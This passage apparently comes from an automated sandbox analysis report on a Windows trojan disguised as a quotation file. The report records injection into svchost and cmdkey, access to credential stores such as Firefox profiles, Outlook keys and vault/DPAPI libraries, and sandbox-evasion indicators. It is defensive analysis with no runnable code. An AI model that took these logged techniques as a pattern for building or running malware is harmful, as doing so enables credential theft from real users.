                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031851C06_2_031851C0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0319B1E06_2_0319B1E0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B508C6_2_031B508C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0318B0D06_2_0318B0D0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032370F16_2_032370F1
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0321D62C6_2_0321D62C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0322D6466_2_0322D646
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323F6F66_2_0323F6F6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031F36EC6_2_031F36EC
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032375C66_2_032375C6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323F5C96_2_0323F5C9
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031ED4806_2_031ED480
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032154906_2_03215490
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031BDB196_2_031BDB19
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323FB2E6_2_0323FB2E
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03211B806_2_03211B80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323FA896_2_0323FA89
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0319FAA06_2_0319FAA0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031C59C06_2_031C59C0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031499E86_2_031499E8
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031838006_2_03183800
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323F8726_2_0323F872
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031898706_2_03189870
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0319B8706_2_0319B870
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031F58706_2_031F5870
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031858B06_2_031858B0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031F98B26_2_031F98B2
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032378F36_2_032378F3
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032318DA6_2_032318DA
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323FF636_2_0323FF63
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031FFF406_2_031FFF40
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03231FC66_2_03231FC6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03181EB26_2_03181EB2
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03239ED26_2_03239ED2
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323FD276_2_0323FD27
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03237D4C6_2_03237D4C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03189DD06_2_03189DD0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0321FDF46_2_0321FDF4
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03183C606_2_03183C60
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03219C986_2_03219C98
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03207CE86_2_03207CE8
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0319FCE06_2_0319FCE0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303EF386_2_0303EF38
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303E3736_2_0303E373
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303E2556_2_0303E255
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303E7146_2_0303E714
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303D7D86_2_0303D7D8
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303CA886_2_0303CA88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BEF10 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887BE4 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B910 appears 278 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AE692 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875050 appears 58 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: String function: 000C9CB3 appears 31 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: String function: 000E0A30 appears 46 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: String function: 000DF9F2 appears 40 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 031B5050 appears 58 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0316B910 appears 275 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 031EE692 appears 86 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 031C7BE4 appears 101 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 031FEF10 appears 105 times
                Source: QUOTATION#050125.exe, 00000002.00000003.288634641779.0000000003AB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe
                Source: QUOTATION#050125.exe, 00000002.00000003.288635000975.0000000003E1D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe
                Source: QUOTATION#050125.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001337B5 GetLastError,FormatMessageW,2_2_001337B5
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001210BF AdjustTokenPrivileges,CloseHandle,2_2_001210BF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_001216C3
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_001351CD
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0014A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_0014A67C
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013648E CoInitialize,CoCreateInstance,CoUninitialize,2_2_0013648E
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_000C42A2
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeFile created: C:\Users\user\AppData\Local\Temp\supergroupsJump to behavior
                Source: QUOTATION#050125.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: QUOTATION#050125.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#050125.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"Jump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: QUOTATION#050125.exeStatic file information: File size 1755136 > 1048576
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: QUOTATION#050125.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: cmdkey.pdb source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
                Source: QUOTATION#050125.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: QUOTATION#050125.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: QUOTATION#050125.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: QUOTATION#050125.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: QUOTATION#050125.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_000C42DE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E0A76 push ecx; ret 2_2_000E0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040505A push cs; iretd 3_2_00405061
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040189C push ss; iretd 3_2_004018A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004180AB push esp; ret 3_2_004180AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040514D push ds; iretd 3_2_00405171
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411A63 push ebp; retf 3_2_00411A6D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407270 push 0000006Ch; iretd 3_2_0040727B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418274 push esp; retf 3_2_00418281
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403340 push eax; ret 3_2_00403342
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004174CC push esp; retf 3_2_004174D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004045D4 push esp; iretd 3_2_004045DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00413663 push cs; ret 3_2_00413695
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417630 push edi; ret 3_2_0041763A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D6A4 push ds; ret 3_2_0040D6B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00404F63 push esi; iretd 3_2_00404F66
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038308CD push ecx; mov dword ptr [esp], ecx3_2_038308D6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031421AD pushad ; retf 0004h6_2_0314223F
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031708CD push ecx; mov dword ptr [esp], ecx6_2_031708D6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031497A1 push es; iretd 6_2_031497A8
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0304124E push ebp; ret 6_2_03041250
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_030352B4 push edi; ret 6_2_030352B7
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03045042 push eax; ret 6_2_03045044
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303753D push edx; iretd 6_2_0303753E
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03036404 push ecx; ret 6_2_03036405
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_030354A5 push esp; iretd 6_2_030354C2
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03035B8D push FFFFFFC9h; iretd 6_2_03035B96
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03034BA2 push esp; iretd 6_2_03034BA3
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303C9AE push eax; retf 6_2_0303C9B9
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_030348F7 pushad ; iretd 6_2_03034902
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03034F53 push ss; retf 6_2_03034FCF
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303FFF4 push esp; retf 6_2_0303FFF7
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_000DF98E
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00151C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00151C41
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_2-98853
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeAPI/Special instruction interceptor: Address: E1B314
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D144
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D604
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D764
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D324
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D364
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D004
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254FF74
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFC8254D864
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387088E rdtsc 3_2_0387088E
                Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9852Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeAPI coverage: 3.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 1.7 %
                Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012Thread sleep time: -242000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012Thread sleep count: 9852 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012Thread sleep time: -19704000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe TID: 2512Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000FC2A2 FindFirstFileExW,2_2_000FC2A2
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001368EE FindFirstFileW,FindClose,2_2_001368EE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0013698F
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0012D076
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0012D3A9
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00139642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00139642
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0013979D
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00139B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00139B2B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0012DBBE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00135C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00135C97
